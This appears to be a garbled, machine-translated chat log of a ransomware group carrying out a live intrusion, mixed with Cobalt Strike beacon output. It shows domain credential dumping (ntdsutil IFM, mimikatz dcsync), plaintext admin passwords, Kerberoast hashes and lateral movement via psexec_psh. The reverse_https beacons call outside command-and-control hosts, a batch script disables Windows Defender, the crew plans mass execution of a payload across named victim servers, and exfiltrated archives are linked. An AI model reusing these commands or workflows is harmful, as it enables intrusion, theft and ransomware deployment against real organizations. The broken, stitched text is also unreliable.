{402158c9-f22e-4d42-aaae-a52bf2e96cc8} mounted as C:\$SNAP_202010061119_VOLUMEC$\ Snapshot {402158c9-f22e-4d42-aaae-a52bf2e96cc8} is already mounted. Initiating DEFRAGMENTATION mode... Source Database: C:\$SNAP_202010061119_VOLUMEC$\Windows\NTDS\ntds.dit Target Database: c:{windows\temp\abcd\Active Directory\ntds.dit Defragmentation Status (% complete) 0 10 20 30 40 50 60 70 80 90 100 |----|----|----|----|----|----|----|----|----|----| ................................................... Copying registry files... 
Copying c:\windows\temp\abcd\registry\SYSTEM Copying c:{windows\temp\abcd\registry\SECURITY Snapshot {402158c9-f22e-4d42-aaae-a52bf2e96cc8} unmounted. IFM media created successfully in c:\windows\temp\abcd ifm: q ntdsutil: q I do not have a ping to you have not come to you jammed yes-is? +maybe you passcutted your coba mb) I have live from the login domain did not touch them when the data center jumped from saig.frd.global why then sag at the same time?i have not looked in different tries have i asked above445 port was open? accesses are valid? beacon> shell tasklist /s 10.225.10.215 /v [*] Tasked beacon to run: tasklist /s 10.225.10.215 /v [+] host called home, sent: 59 bytes ``Is there a command you in winlogon? On any sysmos and allhost called home, sent 60 bytes, no output``. [*] Tasked beacon to run mimikatz's @lsadump::dcsync /domain:legalco.local /all /csv command [+] host called home, sent: 438858 bytes [-] could not spawn C:\Windows\system32\mstsc.exe: 2 [-] Could not connect to pipe: 2 ``What's the error? 
``tasklist doesn't give out processes where I put them strange that not all servers are in the servers group)`` what a strange group of servers...`` Servers: ``Could I log what...? I logged what I could, I logged f by domain login and hash immediately here, did you log YES and hashes? 2 minutesThat takes time`` ERROR: Logon failure: unknown user name or bad password ``First things first ``beacon> shell tasklist /s 10.195.23.13 /v [*] Tasked beacon to run: tasklist /s 10.195.23.13 /v [+] host called home, sent: 58 bytes ``Let's find a worker and get those admins' hashes off. Don't do that again, you'll get bogged down. beacon> shell tasklist /s 10.195.23.14 /v [*] Tasked beacon to run: tasklist /s 10.195.23.14 /v [+] host called home, sent: 58 bytes [+] received output: ERROR: Logon failure: unknown user name or bad password. 
``or are the creds invalid?``All 5 off rps?``Are there only 5@user3 many more left?``I'm not done,don't get the tosslists here inside the hell info,hashes,creds.txt and tdarhiv = name of domainsdump reports by domainsdoesn't finishdosort cars0.dead.zohocorpin.comd I remembered that we were just a wpn and couldn't find a wpn past? since fall stilld like 100 years no.... (do we not have sessions here? passyone here will be exactly about 20 + would be good. in tv there will be swampy yes? all the same as yesterday) tv with what work7:space_invader:hihi Hi all, it's deaf here, no luck to get online, still under vpnom tell me how are things here? Remote Admin ``` That means he's an admin) AWS-VPDC01 10.5.20.30 `` beacon> rev2self [*] Tasked beacon to revert token beacon> make_token .\administrator Tabiam*987 [*] Tasked beacon to create a token for .\administrator beacon> jump psexec_psh AWS-VDDC01 https [*] Tasked beacon to run windows/beacon_https/reverse_https (fixtom.com:443) on AWS-VDDC01 via Service Control Manager (PSH) [+] host called home, sent: 214325 bytes [+] Impersonated DATACENTER2\Administrator [-] Could not open service control manager on AWS-VDDC01: 5 [-] Could not connect to pipe (\AWS-VDDC01\pipe\status_59f6): 1326 ``These are the balls, so far, just these``. 
\AWS-VPDC02/ADMIN$ - Remote Admin \AWS-VPDC02/PC$ - Default share \AWS-VPDC02/IPC$ - Remote IPC \AWS-VPDC02$ - Logon server share \\Logon server share \\{\HO-VPDC01/ADMIN$ - Remote Admin \\{\HO-VPDC01\C$ - Default share \\Remote IPC$ - Remote IPC \\Home server share - Logon server share \\Logon server share (SYSVOL) \AWS-VDDC01/ADMIN$ - Remote Admin \\{\AWS-VDDC01\C$ - Default share \AWS-VDDC01/IPC$ - Remote IPC \\Logon server share (SNETLOGON) \\Print$ - Printer Drivers \\SYSVOL - Logon server share \AWS-VPDC01/ADMIN$ - Remote Admin \AWS-VPDC01\C$ - Default share \AWS-VPDC01/IPC$ - Remote IPC \\Logon server share (SNETLOGON) \\Logon server share \AWS-VPLODC01/ADMIN$ - Remote Admin \AWS-VPLODC01$ - Default share \AWS-VPLODC01/IPC$ - Remote IPC \\Logon server share (SNETLOGON) \AWS-VPLODC01\SYSVOL - Logon server share `````` ``Check carefully in the syslogin, where did we get this from? KLLOGIN=administrator KLPASSWD=Tabiam*987The script doesn't find the ball, no trusts, it writes to remote desktop usersThere seems to be no trusts ``` [*] 10/02 14:15:37 - Executing PowerView Get-DomainTrust via PowerPick [*] Tasked beacon to run: Get-DomainTrust -Server 10.7.20.30 -Domain matches.com (unmanaged) [+] host called home, sent: 133715 bytes If they are not going to be dismounted, then let's go back to the original problem: I don't understand why they shouldn't be dismounted, but if they are, why should I ignore them? OU=OLD Disabled Users,OU=Disabled Accounts ``Can't take anything down, just up-to-date information especially after news like this is always goodAfter this, the lists of DAs may have changed, as well as the lists of DCs, some of the network may have been closed``` CN=Service Accounts ``Then maybe the service ac-[ ](https://mediaeveryone.com/group/matches?msg=oG8izZZgEp6uYmy5h) DA was? 
Pull out the lists of pcs, users and in them by group find domain controller, domain adminI don't understand a bit why to do this on a dedicat`` beacon> shell net group "domain admins" /dom && net group "enterprise admins" /dom && net localgroup administrators [*] Tasked beacon to run: net group "domain admins" /dom && net group "enterprise admins" /dom && net localgroup administrators [+] host called home, sent: 132 bytes [+] received output: The request will be processed at a domain controller for domain WORKGROUP. System error 1355 has occurred. The specified domain either does not exist or could not be contacted. `````` beacon> net domain_controllers [*] Tasked beacon to run net domain_controllers [+] host called home, sent: 104518 bytes [+] received output: Domain Controllers: [-] Error: 0 beacon> net domain [*] Tasked beacon to run net domain [+] host called home, sent: 257 bytes ``Yes, EA, DK re-do list-ping see host? Did I do something wrong again? beacon> net view \\\HK-VPDC01 /all [*] Tasked beacon to run net view on \\HK-VPDC01 /all [+] host called home, sent: 104504 bytes [+] received output: List of hosts for domain '\\HK-VPDC01 /all': Server Name IP Address Platform Version Type Comment ----------- ---------- -------- ------- ---- ------- [-] Error: 87 beacon> net view \AWS-VDDC01 /all [*] Tasked beacon to run net view on \AWS-VDDC01 /all [+] host called home, sent: 104504 bytes [+] received output: List of hosts for domain '\AWS-VDDC01 /all': Server Name IP Address Platform Version Type Comment ----------- ---------- -------- ------- ---- ------- [-] Error: 87 `````` .PARAMETER Domain Domain to query for machines. ````Invoke-ShareFinder -HostList hosts.txt function Invoke-ShareFinder { <# .SYNOPSIS Finds (non-standard) shares on machines in the domain. 
Author: @harmj0y .DESCRIPTION This function finds the local domain name for a host using Get-NetDomain, queries the domain for all active machines with Get-NetComputers, then for each server it lists of active shares with Get-NetShare. Non-standard shares can be filtered out with -Exclude* flags. .PARAMETER HostList List of hostnames/IPs to search. .PARAMETER ExcludeStandard. Exclude standard shares from display (C$, IPC$, print$ etc). .PARAMETER ExcludePrint Exclude the print$ share .PARAMETER ExcludeIPC Exclude the IPC$ share .PARAMETER CheckShareAccess Only display found shares that the local user has access to. .PARAMETER CheckAdmin Only display ADMIN$ shares the local user has access to. .PARAMETER Ping Ping each host to ensure it's up before enumerating. .PARAMETER NoPing Ping each host to ensure it's up before enumerating. .PARAMETER NoPing Don't ping each host to ensure it's up before enumerating. .PARAMETER Delay Delay between enumerating hosts, defaults to 0 .PARAMETER Jitter Jitter for the host delay, defaults to +/- 0.3 .PARAMETER Domain Domain to query for machines. .EXAMPLE > Invoke-ShareFinder Find shares on the domain. .EXAMPLE > Invoke-ShareFinder -ExcludeStandard Find non-standard shares on the domain. .EXAMPLE > Invoke-ShareFinder -Delay 60 Find shares on the domain with a 60 second (+/- *.3) Randomized delay between touching each host. .EXAMPLE > Invoke-ShareFinder -HostList hosts.txt Find shares for machines in the specified hostlist. .LINK http://blog.harmj0y.net Also, you can make life a lot easier for yourself. 
net view \hostname /all ``` take ad_computers.txt and from there one by one insert hostnames into the command instead of hostnameda) ``) beacon> psinject 7256 x64 Invoke-ShareFinder [*] Tasked beacon to psinject: Invoke-ShareFinder into 7256 (x64) [+] host called home, sent: 133723 bytes [+] received output: ERROR: Exception calling "FindAll" with "0" argument(s): "The specified domain either does not exist or ERROR: could not be contacted. ERROR: " ERROR: At line:849 char:9 ERROR: + $CompSearcher.FindAll() | ForEach-Object { ERROR: + ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ERROR: + CategoryInfo : NotSpecified: (:) [], MethodInvocationException ERROR: + FullyQualifiedErrorId : COMException ERROR: WARNING: [!] No hosts found! beacon> net view \\hostname /all [*] Tasked beacon to run net view on \hostname /all [+] host called home, sent: 104504 bytes [+] received output: List of hosts for domain '\\hostname /all': Server Name IP Address Platform Version Type Comment ----------- ---------- -------- ------- ---- ------- [-] Error: 87 Do not forget to re-create EA, DA lists all where there may be a password from the service DA or just from the DA, they have scripts ps1, cmd,bat, some credentials, password, account files, etc.Then do it now, if the script does not start, then manually (or via bATK) through the `net view \\\hostname /all` there are already a lot of things tried, I thought and did it, now on the search looked - was not - have you run it when the domain is visible?as a tool or output in this domain? beacon> shell wmic /node:192.168.110.198 logicaldisk get caption /user:dom.helpathome.com\abunag /password:Start2020 [*] Tasked beacon to run: wmic /node:192.168.110.198 logicaldisk get caption /user:dom.helpathome.com\abunag /password:Start2020 [+] host called home, sent: 133 bytes [+] received output: Invalid GET switch. ``I'll finish up here quietly and dovroverify it, and then divide the tasks by server@tl1 all there. 
you're not needed here anymore, go to helpathomeThe handle is invalid. it's a protection against running under a system context by removing the token beforehand and specifying YES tokens when done - try without the "-s" parameter let it spin not even read the conf) seems to have gone with the file ... see what you're doing try it with the cradle if you can't get the service under the token to try and bump the userhosts in the file and check that the error is flying at the moment of the domain inquiry Reading from a File Another way you can run commands on multiple computers at once is to use a text file. Using the syntax @, PsExec will read every line in the text file as if it were a computer name. It will then process each computer individually. ``error tm1psek caught the bug = )How are you doing? it's almost 3 hours already and psexec is already done, what's the difference, kill the services that can hold files and that's it? who knows how to tell if it's autorun service or not? and from token domain admin itself in system32 drop only psexec and the file itself psexec \\* -d -s -h start.exe -accepteula -y ``and run it like this@tl1 drop psexec utility on DC2 while the file works with the server systems already "touched"``they switched to Acronisvlom OK, I already found that NACs are inactive.there it is not there or turn all domain records in dnscmd I thought there is a full page dump from Everhirs Peak to the bottom of the Mariana Trench DNS Servers ... ... ... ... : 192.168.0.222 127.0.0.1 I wonder if you can at least show them? @tl1 dump the DK dns records, maybe we'll find something else there....2not good for two reasons 1 - because I didn't tell you to take it off. 2 - because no one figured it out. = )but the DNS records from the DNS server have not been removed? 
it is currently inactiveThis is not very relevant in part, but it is registered in the DNS with a busy name Pinging nasstorage1.loomisco.com [192.168.0.231] with 32 bytes of data:Even if I saw it192.168.0.231 does anyone know this host? dominant server webservers and kilt pids that may occupy important processesstop services that are in autorun on momaunnyh machines so what? I have not changed it) the main thing then run under the same tokenDaSession made token in the SYSTEM what? systems rights with token? and under them to run the same file where the mounTeam be sure to run the file with SYSTEM rights Status Local Remote Network ------------------------------------------------------------------------------- OK A: \loomiswebsrv4\d$ Microsoft Windows Network OK E: \loomisgw2\d$ Microsoft Windows Network OK Q: \loomiswebsrv4\c$ Microsoft Windows Network OK W: \loomiswebsrv4\f$ Microsoft Windows Network OK X: \loomisgw2\c$ Microsoft Windows Network OK Z: \loomiswebsrv4\e$ Microsoft Windows Network ``There are all active logical disks of the 4 hosts where our file was deleted by an aver beacon> shell net use [*] Tasked beacon to run: net use [+] host called home, sent: 170 bytes [+] received output: New connections will be remembered. Status Local Remote Network ------------------------------------------------------------------------------- OK E: \TLCAutoTFR.loomisco.com\c$ Microsoft Windows Network OK F: \TLCEPICDB01.loomisco.com\c$ Microsoft Windows Network OK G: \TLCEPICDB01.loomisco.com\e$ Microsoft Windows Network OK H: \TLCEPICDB01.loomisco.com\f$ Microsoft Windows Network OK I: \TLCSQLDB1.loomisco.com\c$ Microsoft Windows Network OK J: \TLCSQLDB1.loomisco.com\e$ Microsoft Windows Network OK L: \TLCSQLDB1.loomisco.com\f$ Microsoft Windows Network OK M: \TLCEPICIIS1.loomisco.com\c$ Microsoft Windows Network The command completed successfully. 
``We end up with something like this
beacon> shell wmic /node:loomiswebsrv4 logicaldisk get caption
[*] Tasked beacon to run: wmic /node:loomiswebsrv4 logicaldisk get caption
[+] host called home, sent: 79 bytes
[+] received output:
Caption
C:
D:
E:
F:
G:

beacon> shell wmic /node:loomisgw2 logicaldisk get caption
[*] Tasked beacon to run: wmic /node:loomisgw2 logicaldisk get caption
[+] host called home, sent: 75 bytes
[+] received output:
Caption
C:
D:
E:
``
Any time I try to upload a file:
You can't connect to the file share because it's not secure. This share requires the obsolete SMB1 protocol, which is unsafe and could expose your system to attack. Your system requires SMB2 or higher. For more info on resolving this issue, see: https://go.microsoft.com/fwlink/?linkid=852747
0 file(s) copied.
``Errors like this``
beacon> jump psexec 10.10.10.5 pipe
[*] Tasked beacon to run windows/beacon_bind_pipe (\\.\pipe\msagent_9072) on 10.10.10.5 via Service Control Manager (\\10.10.10.5\ADMIN$\c316488.exe)
[+] host called home, sent: 287849 bytes
[-] could not upload file: 384
[-] Could not open service control manager on 10.10.10.5: 1722
[-] Could not connect to pipe: 384

beacon> jump psexec loomiswebsrv4 pipe
[*] Tasked beacon to run windows/beacon_bind_pipe (\\.\pipe\msagent_9072) on loomiswebsrv4 via Service Control Manager (\\loomiswebsrv4\ADMIN$\7261303.exe)
[+] host called home, sent: 285742 bytes
[-] could not upload file: 384
[+] host called home, sent: 2122 bytes
[-] Could not open service control manager on loomiswebsrv4: 1722
[-] Could not connect to pipe: 384

To find out all logical drives on those hosts where the file does not start, do the following:
shell wmic logicaldisk get caption
``
Application Server:
TLCEPICAS01.loomisco.com +
Web DB:
loomisgwdb2.loomisco.com +
File Server:
TLCStorage1.loomisco.com +
ScanStorage.loomisco.com +
EobStorage.loomisco.com +
Wyomissing_Ex1.loomisco.com +
STORAGE.loomisco.com +
FAX Server:
LOOMISFAXR02.loomisco.com +
LOOMISFAXR01.loomisco.com -
Print Server:
Printsrv16.loomisco.com +
Printsrv08.loomisco.com +
Finance:
FSITrack.loomisco.com +
Web Server:
TLCWebP2.loomisco.com +
loomiswebsrv4.loomisco.com -
TLCWEBT1.loomisco.com +
TLCWEBP1.loomisco.com +
loomisgw2.loomisco.com -
Utility Server:
TLCMONITORING.loomisco.com +
TLCSophos.loomisco.com +
VMs:
WebChat.loomisco.com +
Metafile-vm1.loomisco.com +
LOOMISGT2.loomisco.com +
HCL Sametime: (HCL Sametime is a client-server application and middleware platform that provides real-time, unified communications and collaboration for enterprises. Those capabilities include presence information, enterprise instant messaging, web conferencing, community collaboration, and telephony capabilities and integration)
LDSWYO21.loomisco.com +
Bitvise SSH Server; DHCP:
TLCSKLM2.loomisco.com +
Applied Epic (Applied Epic is the most technologically advanced cloud-based software application built for independent insurance agencies to automate business operations and drive connectivity to insurers and insureds in the changing insurance marketplace)
EpicAPM.loomisco.com +
TLCEPICCS01.loomisco.com +
``
Well, I'm married there. I need it for now
FAXR01 do not touch
LOOMISFAXR01 on what?
1) I am on the current machine from where the session is to run too?
through the drive letter, so we do the following:
- leave all sessions on these servers open, to make sure the processes holding the other files are dead before running the file (just kill them manually)
- mount all logical drives of these 4 servers on one "own" server
Taking it apart makes no sense, in fact; there may be two reasons for this:
1) the AV policies haven't been updated (since we haven't uninstalled the agent itself, it keeps working on its own policies explicitly assigned to these hosts)
2) Windows Defender is a fierce windup; there are 4 hosts where the file is being pulled down because of some "special" AV settings
only 2 out of 30 servers did not start via jump, but started later via DLL loading of the stager and wmic; at the moment manual work + the rest on their list; go through everything, it's ready
You don't need to touch them. I took these from your list and put them to work:
Application Server:
TLCEPICAS01.loomisco.com
Web DB:
loomisgwdb2.loomisco.com +
File Server:
TLCStorage1.loomisco.com +
ScanStorage.loomisco.com +
EobStorage.loomisco.com +
Wyomissing_Ex1.loomisco.com +
STORAGE.loomisco.com +
``Go to the bottom again + on pwsh, AMSI works for you, not psexec; don't open it```
Application Server:
TLCEPICAS01.loomisco.com
Web DB:
loomisgwdb2.loomisco.com
File Server:
TLCStorage1.loomisco.com
ScanStorage.loomisco.com
EobStorage.loomisco.com +
Wyomissing_Ex1.loomisco.com -
STORAGE.loomisco.com -
FAX Server:
LOOMISFAXR02.loomisco.com -
LOOMISFAXR01.loomisco.com -
Print Server:
Printsrv16.loomisco.com -
Printsrv08.loomisco.com +
Finance:
FSITrack.loomisco.com
Web Server:
TLCWebP2.loomisco.com -
loomiswebsrv4.loomisco.com -
TLCWEBT1.loomisco.com -
TLCWEBP1.loomisco.com -
loomisgw2.loomisco.com -
Utility Server:
TLCMONITORING.loomisco.com +
TLCSophos.loomisco.com
VMs:
WebChat.loomisco.com +
Metafile-vm1.loomisco.com -
LOOMISGT2.loomisco.com +
HCL Sametime: (HCL Sametime is a client-server application and middleware platform that provides real-time, unified communications and collaboration for enterprises. Those capabilities include presence information, enterprise instant messaging, web conferencing, community collaboration, and telephony capabilities and integration)
LDSWYO21.loomisco.com -
Bitvise SSH Server; DHCP:
TLCSKLM2.loomisco.com -
Applied Epic (Applied Epic is the most technologically advanced cloud-based software application built for independent insurance agencies to automate business operations and drive connectivity to insurers and insureds in the changing insurance marketplace)
EpicAPM.loomisco.com +
TLCEPICCS01.loomisco.com -
``Yeah, bottoms up, you went from the bottom of the list, right?
I'm taking these to work, okay?
```
Application Server:
TLCEPICAS01.loomisco.com
Web DB:
loomisgwdb2.loomisco.com
File Server:
TLCStorage1.loomisco.com
ScanStorage.loomisco.com
EobStorage.loomisco.com
Wyomissing_Ex1.loomisco.com
STORAGE.loomisco.com
``consider that no one has heard it)``
I get it, my token is not set, read it))))))
there will always be a percentage of machines where you can't jump, because either there is a ban on running the service, or who knows; all jumps work through the service, so then you need to open the file and go on
skip this, put a mark if you paid attention
you can't open the service, it doesn't want to open
beacon> jump psexec_psh loomisgw2.loomisco.com https
[*] Tasked beacon to run windows/beacon_https/reverse_https (landcook.com:443) on loomisgw2.loomisco.com via Service Control Manager (PSH)
[+] host called home, sent: 7825 bytes
[-] Could not open service control manager on loomisgw2.loomisco.com: 1722
[+] host called home, sent: 206472 bytes
[-] Could not connect to pipe (\\loomisgw2.loomisco.com\pipe\status_9072): 384

beacon> jump psexec_psh TLCWEBT1.loomisco.com https
[*] Tasked beacon to run windows/beacon_https/reverse_https (landcook.com:443) on TLCWEBT1.loomisco.com via Service Control Manager (PSH)
[+] host called home, sent: 7824 bytes
[-] Could not open service control manager on TLCWEBT1.loomisco.com: 5
[+] host called home, sent: 206454 bytes
[-] Could not connect to pipe (\\TLCWEBT1.loomisco.com\pipe\status_9072): 2

beacon> jump psexec_psh loomiswebsrv4.loomisco.com https
[*] Tasked beacon to run windows/beacon_https/reverse_https (landcook.com:443) on loomiswebsrv4.loomisco.com via Service Control Manager (PSH)
[+] host called home, sent: 7829 bytes
[-] Could not open service control manager on loomiswebsrv4.loomisco.com: 1722
[+] host called home, sent: 206474 bytes
[-] Could not connect to pipe (\\loomiswebsrv4.loomisco.com\pipe\status_9072): 384
``
Did you do it without forcing? GPO policies take up to an hour and a half; do it; if not, you did not do it, there was
this item? did you do everything according to the instructions@tl1 did you force the gpoapdate? skip this for now, we can bypass it in a slightly different way at the end``` beacon> shell def.bat [*] Tasked beacon to run: def.bat [+] host called home, sent: 38 bytes [+] received output: C:\Windows\system32>reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v C:\ /t reg_dword /d 0 /f ERROR: Access is denied. C:{Windows\system32>reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v C:{Windows\ /t reg_dword /d 0 /f ERROR: Access is denied. C:{Windows\system32>reg add "HKLM\SYSTEM\CurrentControlSet\services\WinDefend" /v Start /t REG_DWORD /d 4 /f ERROR: Access is denied. C:{Windows\system32>reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f The operation completed successfully. C:\Windows\system32>powershell.exe /c Add-MpPreference -ExclusionPath C:\ProgramData, C:\Windows Add-MpPreference : The term 'Add-MpPreference' is not recognized as the name of a cmdlet, function, script file, or operable program. Check the spelling of the name, or if a path was included, verify that the path is correct and try again. At line:1 char:1 + Add-MpPreference -ExclusionPath C:\ProgramData, C:\Windows + ~~~~~~~~~~~~~~~~ + CategoryInfo : ObjectNotFound: (Add-MpPreference:String) [], Co mmandNotFoundException + FullyQualifiedErrorId : CommandNotFoundException C:{Windows\system32>sc config WinDefend start= disabled [SC] OpenService FAILED 5: Access is denied. C:\Windows\system32>sc stop WinDefend [SC] OpenService FAILED 5: Access is denied. C:{Windows\system32>powershell.exe -exec Bypass /c Set-MpPreference -DisableRealtimeMonitoring $true Set-MpPreference : The term 'Set-MpPreference' is not recognized as the name of a cmdlet, function, script file, or operable program. Check the spelling of the name, or if a path was included, verify that the path is correct and try again. 
At line:1 char:1 + Set-MpPreference -DisableRealtimeMonitoring $true. + ~~~~~~~~~~~~~~~~ + CategoryInfo : ObjectNotFound: (Set-MpPreference:String) [], Co mmandNotFoundException + FullyQualifiedErrorId : CommandNotFoundException ``And here's a protected registry hive, and this is a + - knocks out Defender``. reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v C:\ /t reg_dword /d 0 /f reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v C:\Windows\ /t reg_dword /d 0 /f reg add "HKLM\SYSTEM\CurrentControlSet\services\WinDefend" /v Start /t REG_DWORD /d 4 /f reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f powershell.exe /c Add-MpPreference -ExclusionPath C:\ProgramData, C:\Windows sc config WinDefend start= disabled sc stop WinDefend powershell.exe -exec Bypass /c Set-MpPreference -DisableRealtimeMonitoring $true Now the problems have started, which can only be "caught" by manual control. TLCEPICIIS1 - the file is cut by an aver on startup, which one - vindef or sofos is not clear because both PIDs are present and for this in any case better to run manually ie, change the date on all files in the root of the disk the most important thing to check manually that the file works ud and plenty of alternatives batch run it via psekzek remote eczekUЪ because I left it on my list I don't see dk in the list))) you can do it in a hundred other ways - but here it is quite convenient and so because the network is small I load on each) I am not lazy) a few clicks do not touch the dk till the end.I top down this is your servers bottom up move down the list or upload to each? 
Application Server:
TLCEPICAS01.loomisco.com
Web DB:
loomisgwdb2.loomisco.com
File Server:
TLCStorage1.loomisco.com
ScanStorage.loomisco.com
EobStorage.loomisco.com
Wyomissing_Ex1.loomisco.com
STORAGE.loomisco.com
FAX Server:
LOOMISFAXR02.loomisco.com
LOOMISFAXR01.loomisco.com
Print Server:
Printsrv16.loomisco.com
Printsrv08.loomisco.com
Finance:
FSITrack.loomisco.com
Web Server:
TLCWebP2.loomisco.com
loomiswebsrv4.loomisco.com
TLCWEBT1.loomisco.com
TLCWEBP1.loomisco.com
loomisgw2.loomisco.com
Utility Server:
TLCMONITORING.loomisco.com
TLCSophos.loomisco.com
VMs:
WebChat.loomisco.com
Metafile-vm1.loomisco.com
LOOMISGT2.loomisco.com
HCL Sametime: (HCL Sametime is a client-server application and middleware platform that provides real-time, unified communications and collaboration for enterprises. Those capabilities include presence information, enterprise instant messaging, web conferencing, community collaboration, and telephony capabilities and integration)
LDSWYO21.loomisco.com
Bitvise SSH Server; DHCP:
TLCSKLM2.loomisco.com
Applied Epic (Applied Epic is the most technologically advanced cloud-based software application built for independent insurance agencies to automate business operations and drive connectivity to insurers and insureds in the changing insurance marketplace)
EpicAPM.loomisco.com
TLCEPICCS01.loomisco.com
where is the executable? where can you run it from?
I'm running the executable while I'm going through an open session in the list of servers
so that's it, there's nothing interesting))
this should not stop you; 3 is only 3 times more than 1
Navigate to Computer Configuration > Administrative Templates > Windows Components > Windows Defender
``there's no plain Windows Defender
That's different from the guide, because you have to disable it where there's no Sophos agent
Turn it off quietly, or touch it? I mean, don't touch Windows Defender?
lol) thank fuck dad for these 21st century black sessions
5 sessions in less than a minute
beacon> jump psexec_psh TLCBENTS02.loomisco.com https
[*] Tasked beacon to run windows/beacon_https/reverse_https (landcook.com:443) on TLCBENTS02.loomisco.com via Service Control Manager (PSH)
[+] host called home, sent: 214286 bytes
[+] received output:
Started service 2c89d98 on TLCBENTS02.loomisco.com

beacon> jump psexec_psh TLCBENTS01.loomisco.com https
[*] Tasked beacon to run windows/beacon_https/reverse_https (landcook.com:443) on TLCBENTS01.loomisco.com via Service Control Manager (PSH)
[+] host called home, sent: 214293 bytes
[+] received output:
Started service 3a753bc on TLCBENTS01.loomisco.com

beacon> jump psexec_psh TLCRDSLIC1.loomisco.com https
[*] Tasked beacon to run windows/beacon_https/reverse_https (landcook.com:443) on TLCRDSLIC1.loomisco.com via Service Control Manager (PSH)
[+] host called home, sent: 214302 bytes
[+] received output:
Started service 5db0202 on TLCRDSLIC1.loomisco.com

beacon> jump psexec_psh TLCEPICTS02.loomisco.com https
[*] Tasked beacon to run windows/beacon_https/reverse_https (landcook.com:443) on TLCEPICTS02.loomisco.com via Service Control Manager (PSH)
[+] host called home, sent: 214296 bytes
[+] received output:
Started service 6e0d775 on TLCEPICTS02.loomisco.com

beacon> jump psexec_psh TLCEPICTS01.loomisco.com https
[*] Tasked beacon to run windows/beacon_https/reverse_https (landcook.com:443) on TLCEPICTS01.loomisco.com via Service Control Manager (PSH)
[+] host called home, sent: 214300 bytes
[+] received output:
Started service cdbd232 on TLCEPICTS01.loomisco.com
``
However, Windows Defender didn't start on those servers where the agent is cut off; we just cut it off and now we're showing the focus. Since we haven't deleted the agent, we're live showing....
I'm about beacon > screenshot
disconnect Windows Defender by GPO
http://www.prajwaldesai.com/how-to-turn-off-windows-defender-using-group-policy/
RDP, you see the line at the bottom?
it looks like the line of cobalt? you know where the start menu and so on)and see how the policies are applied respectively? this screenshot from cobalt or rd if it looks so now turn off sofos through the console by adding new policy and update agents then we'll chop windefender via GPO policy right away, let's go, we'll get started - you'll help if needed while we're starting this one - you get the helpathome + i tuta i think everyone is here? @tl1 build please wait for build not see among ad_userfolder files wrong windef log cleaned up, and i also tried through PS but nothing worked from scriptov to arma?in koba does not draw?[ ](https://mediaeveryone.com/group/oasispetroleum-com?msg=WjC8jA9pp3cGTSPik) vtotpis here the last post what was done so far and what the problem forgot) aazaley files by the way yesterday AD did not pour here when picked up)) vindef and i think i already found there what edr product?while put in suspended I will give a new accessthat I'm at a standstill, I can not raise the rights, I tried all sorts of pull in the cobu that it would spin, no luck, and as for eleveit kita none of this does not work (I do not knowkakzakriptovat) then the session in slipnetut trusts are there?+ready after the launch, write back + now I'll give you the buildd if the fix then yes[ ](https://mediaeveryone.com/group/ballymoregroup-com?msg=YCqw2iCZWFzgipPg7) what are you talking about? find a place on the server fix it very well here? $krb5tgs$23$*sqladmin$ballymoregroup.local ballymore2015 ``stupidly-a. they didn't give away any of the downloaded options. i would throw here if there were kerbs unbrushed for a week? + flew in 20 minutes @user4 will be clean not especially if you do not count that flew in 30+ sessions left then clean who coba cleaner? 1let me load Friday's sessions disappearedthere's not much useful information about accesses. i've downloaded a six gig backup here. 
have you looked up and down the iMicrosoft mail here?the root/pass combination does not seem to occur at all, and in the mail it was said that the nimbles are associated with the active directory, tried the DA and the IT guys, tried their passwords with the root, with the admin, does not pass the letter with information about connection to AD was a year ago, if memory serves me correctly, so it is likely that after the previous command they have changed something there if there are any nix machines with root passwords it is logical to check these same root passwords to nimbles and also checked the routers? on nimbles looked for web access? the current - those that were already in operation + EllevateKitnetta)lpe it - Local Privilege Escalation? CVE-2015-2546 CVE-2016-3309 CVE-2017-0101 CVE-2018-8120 CVE-2019-1458 CVE-2020-0796 ``` trying to figure out the exploits, I think they'll fitzlalilsexploit, fill up the rubus and remove the kerbscrewsscale me when you pick it up I'll delete it https://wideio.com/UWaHAGCE3ysxyInTF4bOqTShHpypftKMWQKJ0ZcK/ad.7z ``secmplease let me give it to you ado delete all files, tell me how you'll do it, put file 6 and archive it`` cmd /c 7za a ad.7z ad_computers.txt ad_group.txt ad_ous.txt ad_subnets.txt ad_users.txt you know, now? where is 6:not enough files if you wrap a bunch then there is just a comma separated list without any quotes ?ok i'll pour you 7 tell me how you did upload you adfindshe now upload you there is unlikely to let no LA You do not have systems noticed there is a folder domain admin in the folder usernet, i upload or deadick upload tool and then run in this tool ? and how do I pour the addfynd ? 
C:\temp OAPVDI17 @ OASISPETR\bmolinaro
net localgroup "Administrators"
Alias name     Administrators
Comment        Administrators have complete and unrestricted access to the computer/domain

Members
-------------------------------------------------------------------------------
Administrator
oasis_admin
OASISPETR\Domain Admins
OASISPETR\ryoung
OASISPETR\SCOM 2012 Administrators
The command completed successfully.
00:00.0140

C:\temp OAPVDI17 @ OASISPETR\bmolinaro
net group "Domain Admins" /dom
The request will be processed at a domain controller for domain Oasispetr.com.

Group name     Domain Admins
Comment        Designated administrators of the domain

Members
-------------------------------------------------------------------------------
Administrator            buadmin                  camador_admin
dpeterson_admin          jdehuma_admin            jedmond_admin
ptran_admin              ryoung_admin
The command completed successfully.
00:00.0273

C:\temp OAPVDI17 @ OASISPETR\bmolinaro
net group "Enterprise Admins" /dom
The request will be processed at a domain controller for domain Oasispetr.com.

Group name     Enterprise Admins
Comment        Designated administrators of the enterprise

Members
-------------------------------------------------------------------------------
Administrator            buadmin                  camador_admin
dpeterson_admin          jdehuma_admin            jedmond_admin
ptran_admin              ryoung_admin
The command completed successfully.
``````
user7:QnQnUKIIGIlqeZzisFpexTu92easVI7lyY8
user7:9rczctBY0p4wbKRPIsXqb8hcLY29VhrzDjH - valid?
https://wideio.com/iZsHDvbmvbXLZ8tAeyrT7HbWkZS6Ll40TXCUfJL0
``````
user7:9rczctBY0p4wbKRPIsXqb8hcLY29VhrzDjH
``Okay, congratulations. I'll give you a new tool; meanwhile work from it and wait for feedback. You did not pick it up?``
